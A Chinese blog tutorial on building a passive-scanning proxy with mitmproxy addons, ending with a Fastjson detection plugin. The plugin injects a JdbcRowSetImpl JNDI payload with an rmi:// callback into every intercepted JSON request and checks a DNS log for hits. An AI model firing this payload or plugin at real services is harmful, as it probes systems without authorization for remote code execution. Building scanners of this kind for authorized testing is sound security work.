基于mitmproxy的被动扫描代理

  • A+
所属分类:技术文

前言

Web代理服务器是网络的中间实体,代理位于客户端和服务器之间,扮演中间人的角色,在各端点之间来回传输HTTP报文,而其具体实现有诸如Goproxy,mitmproxy等等开源项目,其中的mitmproxy是Python编写的一款功能完善的代理工具,mitmproxy是一款支持拦截HTTP和HTTPS请求和响应并即时修改它们的交互式中间人代理工具。同时它提供了Python API给开发者编写插件用来自定义对流量进行处理和修改。

本章会使用mitmproxy去实现一个简单的被动扫描代理,以供思路参考。

概述

git clone https://github.com/mitmproxy/mitmproxy.git
cd mitmproxy
./dev.sh

版本 5.0.0.dev

1.png

设置完代理之后,mitmdump爬取效果如下:

2.jpg

mitmproxy的被动扫描代理思路

mitmprxoy 0.16以下的版本是提供libmproxy库给开发者进行拓展的,目前使用的mitmproxy 5.0.5 Dev,已经没有对libmproxy模块进行维护了,其官方文档推荐的是使用mitmproxy的addons插件模块(内联脚本)进行拓展。内联脚本可以使用mitmdump进行执行,以 > mitmdump -s ./anatomy.py 的方式进行调用。官方文档对于addons插件模块的内联脚本格式如下:如上所示,插件中的request和response函数可以用于分别处理对应的请求参数,其函数接受的flow参数为mitmporxy/http.py中的HTTPflow 数据流类,其类中包含HTTPrequest和HTTPresponse等属性。

from mitmproxy import ctx
class Counter:
    def __init__(self):
        self.num = 0
    def request(self, flow):
        self.num = self.num + 1
        ctx.log.info("We've seen %d flows" % self.num)
addons = [
    Counter()
]

如上所示,插件中的request和response函数可以用于分别处理对应的请求参数,其函数接受的flow参数为mitmporxy/http.py中的HTTPflow 数据流类,其类中包含HTTPrequest和HTTPresponse等属性。

3.jpg

对于数据流的请求对象调用,则使用flow.request的方式调用,其数据对象为HTTPrequest对象 ,对象的内容和属性如下所示。

4.jpg

本章被动扫描代理的为被动代理(获取数据流) -> 扫描器扫描的思路。
通过被动扫描器获取数据流然后将数据流导入到扫描进程中,扫描进程进行扫描,输出结果的方式,下面会以demo进行实例。demo将会分别启用扫描和代理两个进程,通过接受代理请求流导入到扫描进程中进行扫描,双进程间主要使用queue来进行进程间的通信。

官方文档介绍的插件运行是以mitmdump -s ./anatomy.py控制终端执行的方式,但为了方便扫描器进行集成,这里采用直接调用mitmproxy模块的方式进行调用。

调用mitmproxy模块的方式主要是通过模拟mitmdump的启动模式进行插件的调用。代码如下,mitmproxy.tools._main将会调用DumpMaster,DumpMaster是master.Master的子类,master.Master是mitmproxy的主线程处理的核心类。

from mitmproxy.tools._main import run
def mitmdump(args=None) -> typing.Optional[int]:
    def extra(args):
        if args.filter_args:
            v = " ".join(args.filter_args)
            return dict(
                save_stream_filter=v,
                readfile_filter=v,
                dumper_filter=v,
            )
        return {}
    m = run(DumpMaster, cmdline.mitmdump, args, extra)
    if m and m.errorcheck.has_errored:
        return 1
    return None

DumpMaster代码如下,通过self.addons.add(HandleRequest(request_queue))的方式添加我们的数据处理插件HandleRequest(),然后使用with_handle_request=True的方式进行启用。

class DumpMaster(master.Master):
    def __init__(
        self,
        options: options.Options,
        with_termlog=False,
        with_dumper=False, # 打印出数据流
        with_handle_request=True,
        with_fast_json_check = True
    ) -> None:
        super().__init__(options)
        self.errorcheck = ErrorCheck()
        if with_termlog: # 添加插件
            self.addons.add(termlog.TermLog(), termstatus.TermStatus())
        self.addons.add(*addons.default_addons())
        if with_dumper:
            self.addons.add(dumper.Dumper())
        if with_handle_request: # 处理请求
            self.addons.add(HandleRequest(request_queue)) # 添加自己的处理请求插件
        if with_fast_json_check:
            self.addons.add(FastJsonCheck())  # 添加fastjson漏洞检测插件
        self.addons.add(
            keepserving.KeepServing(),
            readfile.ReadFileStdin(),
            self.errorcheck
        )

下面的代码为数据流处理实例,数据流处理后的结果将会通过queue的方式传给扫描器进程。

from mitmproxy import ctx
from mitmproxy.http import HTTPFlow
from gevent.queue import Queue
class HandleRequest:
    def __init__(self,request_queue: Queue):
        self.num = 0
        self.request_queue = request_queue
    def request(self, flow: HTTPFlow):
        self.num = self.num + 1
        self.request_queue.put(flow.request.url) # 添加进程
    def response(self,flow: HTTPFlow):
        self.num = self.num + 1

下面代码为扫描器进程demo的代码。它会以Queue接受代理线程传递过来的数据,然后对数据处理,并进程扫描。

request_queue = Queue()
# 扫描进程 通过进程通信,获取请求数据。
def start_scan():
    while 1:
        if not request_queue.empty():
            print("scan ====> " + request_queue.get())
        time.sleep(1)

最后以多线程的方式启动代理进程和扫描器进程。

scanner = threading.Thread(target=start_scan)
    scanner.setDaemon(True) # 守护进程
    scanner.start()
    args = ['--listen-host', '127.0.0.1', '--listen-port', str(8788)]
    print("Proxy server listening at http://127.0.0.1:8788")
    mitmdump(args)

详细代码myproxy.py

import typing
from mitmproxy.tools import cmdline
from mitmproxy import addons
from mitmproxy import options
from mitmproxy import master
from mitmproxy.addons import dumper, termlog, termstatus, keepserving, readfile
from handlerequest import HandleRequest
from fastjson_vuln_check import FastJsonCheck
from mitmproxy.tools._main import run
import threading
import time
from queue import Queue
request_queue = Queue()
def mitmdump(args=None) -> typing.Optional[int]:
    def extra(args):
        if args.filter_args:
            v = " ".join(args.filter_args)
            return dict(
                save_stream_filter=v,
                readfile_filter=v,
                dumper_filter=v,
            )
        return {}
    m = run(DumpMaster, cmdline.mitmdump, args, extra)
    if m and m.errorcheck.has_errored:
        return 1
    return None
class ErrorCheck:
    def __init__(self):
        self.has_errored = False
    def log(self, e):
        if e.level == "error":
            self.has_errored = True
class DumpMaster(master.Master):
    def __init__(
        self,
        options: options.Options,
        with_termlog=False,
        with_dumper=False, # 打印出数据流
        with_handle_request=True,
        with_fast_json_check = True
    ) -> None:
        super().__init__(options)
        self.errorcheck = ErrorCheck()
        if with_termlog: # 添加插件
            self.addons.add(termlog.TermLog(), termstatus.TermStatus())
        self.addons.add(*addons.default_addons())
        if with_dumper:
            self.addons.add(dumper.Dumper())
        if with_handle_request: # 处理请求
            self.addons.add(HandleRequest(request_queue)) # 添加自己的处理请求插件
        if with_fast_json_check:
            self.addons.add(FastJsonCheck())  # 添加fastjson漏洞检测插件
        self.addons.add(
            keepserving.KeepServing(),
            readfile.ReadFileStdin(),
            self.errorcheck
        )
# 扫描进程 通过进程通信,获取请求数据。
def start_scan():
    while 1:
        if not request_queue.empty():
            print("scan ====> " + request_queue.get())
        time.sleep(1)
if __name__ == '__main__':
    scanner = threading.Thread(target=start_scan)
    scanner.setDaemon(True) # 守护进程
    scanner.start()
    args = ['--listen-host', '127.0.0.1', '--listen-port', str(8788)]
    print("Proxy server listening at http://127.0.0.1:8788")
    mitmdump(args)

插件代码handlerequest.py

from mitmproxy import ctx
from mitmproxy.http import HTTPFlow
from gevent.queue import Queue
class HandleRequest:
    def __init__(self,request_queue: Queue):
        self.num = 0
        self.request_queue = request_queue
    def request(self, flow: HTTPFlow):
        self.num = self.num + 1
        self.request_queue.put(flow.request.url) # 添加进程
    def response(self,flow: HTTPFlow):
        self.num = self.num + 1

启动代理后效果如下。python3 myproxy.py 启动

5.png

mitmproxy插件化Fastjson漏洞扫描思路

mitmproxy的支持的addons插件模块允许开发者其自定义对流量进行处理和修改,对于XXE,Fastjson,等基于交互流量的漏洞检测就可以通过mitmptoxy的插件模块进行实现,下面会以fastjson检测脚本进行测试。插件的功能为通过识别application/json数据,然后使用fastjson payload进行发送,通过判断dnslog的的日志结果存在与否来判断漏洞的存在,具体代码如下代码如下:

__author__ = @星光
# -*- coding: UTF-8 -*-
import json
from urllib import parse
import copy
import requests
import time
from mitmproxy.http import HTTPFlow
class FastJsonCheck:
    def __init__(self):
        self.num = 0
    def request(self, flow: HTTPFlow):
        self.num = self.num + 1
        req = ObjectDict()
        req.target = flow.request.url
        content_type = flow.request.headers.get("Content-Type")
        if "application/json" in content_type:
            print("start check fastjosn vuln")
            req.headers =  flow.request.headers
            req.method = flow.request.method
            data = r'{}'
            req.data = data
            req_list = [req]
            for req in req_list:
                if req.get('data'):
                    check_data(req)
                check_target(req)
    def response(self,flow: HTTPFlow):
        self.num = self.num + 1
class ObjectDict(dict):
    """Makes a dictionary behave like an object, with attribute-style access.
    """
    def __getattr__(self, name):
        # type: (str) -> any
        try:
            return self[name]
        except KeyError:
            raise AttributeError(name)
    def __setattr__(self, name, value):
        # type: (str, any) -> None
        self[name] = value
fastjson_paylod = '{"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"f":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://[qtn3aviq63by76utx7jcwrpxtozen3]/Exploit","autoCommit":true}}'
dns_service_address = 'http://xxx.xxx.xxx.xxx:5000'
def get_random_dns_server():
    for i in range(3):
        try:
            resp = requests.post('%s/genname' % dns_service_address, json={'callback': '', 'info': ''},
                                 timeout=(3, 6))
            return str(resp.json()['name'])
        except:
            print(u'Error when get dns server:')
    return None
def has_query_log_for_dns(dns_server):
    for i in range(3):
        try:
            resp = requests.get('%s/success/%s' % (dns_service_address, dns_server), timeout=(3, 6))
            return resp.json()['success']
        except:
            print(u'Error when verify dns server:')
    return None
def is_json(data):
    try:
        value = json.loads(data)
        if isinstance(value, (dict, list)):
            return True
    except Exception as e:
        return False
    return False
def iter_dict(item, json_flag=False):
    if json_flag:
        if isinstance(item, list):
            yield json.loads("[{}]".format(fastjson_paylod))
        if isinstance(item, dict):
            yield json.loads(fastjson_paylod)
    if not isinstance(item, dict):
        return
    for x in item:
        if is_json(item[x]):
            copy_item = copy.deepcopy(item)
            value = json.loads(item[x])
            if isinstance(value, list):
                copy_item[x] = "[{}]".format(fastjson_paylod)
                yield copy_item
            if isinstance(item, dict):
                copy_item[x] = fastjson_paylod
                yield copy_item
def form2dict(data):
    data_dict = parse.parse_qs(data)
    for k in data_dict:
        data_dict[k] = data_dict[k][0]
    return data_dict
def check_data(req_info):
    data = req_info.data
    conten_type = req_info.headers.get("Content-Type", "application/x-www-form-urlencoded")
    is_json = False
    if 'x-www-form-urlencoded' in conten_type:
        is_json = False
    if 'json' in conten_type or 'javascript' in conten_type:
        is_json = True
    if not is_json:
        data_dict = form2dict(data)
    else:
        data_dict = json.loads(data)
    for x in iter_dict(data_dict, is_json):
        copy_req = copy.deepcopy(req_info)
        if is_json:
            copy_req.data = json.dumps(x)
        else:
            copy_req.data = x
        dns_server = get_random_dns_server()
        copy_req.data = copy_req.data.replace("[qtn3aviq63by76utx7jcwrpxtozen3]", dns_server)
        send_req(copy_req)
        time.sleep(1.5)
        if has_query_log_for_dns(dns_server):
            print("[success] found fastjson vul\n{}\n".format(copy_req))
def check_target(req_info):
    target = req_info.target
    parsed = parse.urlparse(target)
    query = parsed.query
    if not query:
        return
    for x in iter_dict(form2dict(query)):
        copy_req = copy.deepcopy(req_info)
        x = parse.urlencode(x)
        copy_req.target = "{}://{}{}?{}".format(
            parsed.scheme, parsed.netloc, parsed.path, x)
        dns_server = get_random_dns_server()
        copy_req.target = copy_req.target.replace("[qtn3aviq63by76utx7jcwrpxtozen3]", dns_server)
        send_req(copy_req)
        time.sleep(1.5)
        if has_query_log_for_dns(dns_server):
            print("[success] found fastjson vul\n{}\n".format(copy_req))
UA = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
def http_req(url, method='get', **kwargs):
    kwargs.setdefault('verify', False)
    kwargs.setdefault('timeout', (10.1, 30.1))
    kwargs.setdefault('allow_redirects', False)
    headers = kwargs.get("headers", {})
    headers.setdefault("User-Agent", UA)
    kwargs["headers"] = headers
    method = method.lower()
    conn = getattr(requests, method)(url, **kwargs)
    return conn
def send_req(req_info):
    conn = http_req(req_info.target, req_info.method, data=req_info.data, headers=req_info.headers)

结果如下:

6.jpg

参考

GitHub–w-digital-scanner/w13scan: Passive Security Scanner (被动安全扫描器)

mitmproxy官方文档

《HTTP权威指南》

avatar

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: